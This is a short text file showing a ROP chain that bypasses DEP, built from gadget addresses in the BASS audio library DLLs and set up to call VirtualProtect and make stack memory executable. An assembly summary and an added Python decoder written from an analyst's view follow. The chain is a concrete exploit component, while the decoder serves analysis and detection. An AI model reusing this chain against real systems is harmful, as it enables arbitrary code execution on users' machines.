bypass_DEP.txt
Example:
0X10010157, # POP EBP # RETN [BASS.DLL]
0X10010157, # SKIP 4 BYTES [BASS.DLL]
0X10015F77, # POP EAX # RETN [BASS.DLL]
0XFFFFFDFF, # VALUE TO NEGATE, WILL BECOME 0X00000201
0X10014DB4, # NEG EAX # RETN [BASS.DLL]
0X10032F72, # XCHG EAX,EBX # RETN 0X00 [BASS.DLL]
0X10015F82, # POP EAX # RETN [BASS.DLL]
0XFFFFFFC0, # VALUE TO NEGATE, WILL BECOME 0X00000040
0X10014DB4, # NEG EAX # RETN [BASS.DLL]
0X10038A6D, # XCHG EAX,EDX # RETN [BASS.DLL]
0X101049EC, # POP ECX # RETN [BASSWMA.DLL]
0X101082DB, # &WRITABLE LOCATION [BASSWMA.DLL]
0X1001621C, # POP EDI # RETN [BASS.DLL]
0X1001DC05, # RETN (ROP NOP) [BASS.DLL]
0X10604154, # POP ESI # RETN [BASSMIDI.DLL]
0X10101C02, # JMP [EAX] [BASSWMA.DLL]
0X10015FE7, # POP EAX # RETN [BASS.DLL]
0X1060E25C, # PTR TO &VIRTUALPROTECT() [IAT BASSMIDI.DLL]
0X1001D7A5, # PUSHAD # RETN [BASS.DLL]
0X10022AA7, # PTR TO 'JMP ESP' [BASS.DLL]
In ASM:
PUSH 0X201                ; dwSize
PUSH 0X40                 ; flNewProtect (PAGE_EXECUTE_READWRITE)
PUSH WRITABLE_LOCATION    ; lpflOldProtect
CALL VIRTUALPROTECT
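
Added example, not part of the original file: an analyst-side decoder that walks the chain listed above and recovers the VirtualProtect call it sets up, as one would when triaging a chain found in a crash dump. The gadget meanings come from the comments in the listing; the function names and the tuple encoding of the chain are assumptions made for this example.

```python
# Added analysis example; gadget meanings come from the listing's comments.
M32 = 0xFFFFFFFF
PAGE_EXECUTE_READWRITE = 0x40
# (dword, gadget) pairs; None marks a data dword consumed by the previous POP.
CHAIN = [
    (0x10010157, "pop EBP"), (0x10010157, None),
    (0x10015F77, "pop EAX"), (0xFFFFFDFF, None),
    (0x10014DB4, "neg EAX"),
    (0x10032F72, "xchg EBX"),            # XCHG EAX,EBX
    (0x10015F82, "pop EAX"), (0xFFFFFFC0, None),
    (0x10014DB4, "neg EAX"),
    (0x10038A6D, "xchg EDX"),            # XCHG EAX,EDX
    (0x101049EC, "pop ECX"), (0x101082DB, None),
    (0x1001621C, "pop EDI"), (0x1001DC05, None),
    (0x10604154, "pop ESI"), (0x10101C02, None),
    (0x10015FE7, "pop EAX"), (0x1060E25C, None),
    (0x1001D7A5, "pushad"),
]

def decode(chain):
    """Track register values up to the PUSHAD gadget."""
    regs, it = {}, iter(chain)
    for _addr, gadget in it:
        kind, _, reg = gadget.partition(" ")
        if kind == "pop":
            regs[reg] = next(it)[0]          # the next dword is data
        elif kind == "neg":
            regs[reg] = -regs[reg] & M32     # 32-bit two's complement
        elif kind == "xchg":
            regs["EAX"], regs[reg] = regs.get(reg), regs["EAX"]
        elif kind == "pushad":
            break
    return regs

def virtualprotect_call(regs):
    """PUSHAD stack, top first: EDI, ESI, EBP, ESP, EBX, EDX, ECX, EAX."""
    return {
        "iat_slot": regs["EAX"],          # JMP [EAX] reads the target here
        "return_to": regs["EBP"],
        "lpAddress": "ESP at PUSHAD",     # runtime value, not in the chain
        "dwSize": regs["EBX"],
        "flNewProtect": regs["EDX"],
        "lpflOldProtect": regs["ECX"],
    }

def requests_rwx(call):
    return call["flNewProtect"] == PAGE_EXECUTE_READWRITE

if __name__ == "__main__":
    print(virtualprotect_call(decode(CHAIN)))
```

The decoded frame shows a request to mark 0x201 bytes at the current stack pointer as PAGE_EXECUTE_READWRITE, which is the event API monitoring can alert on.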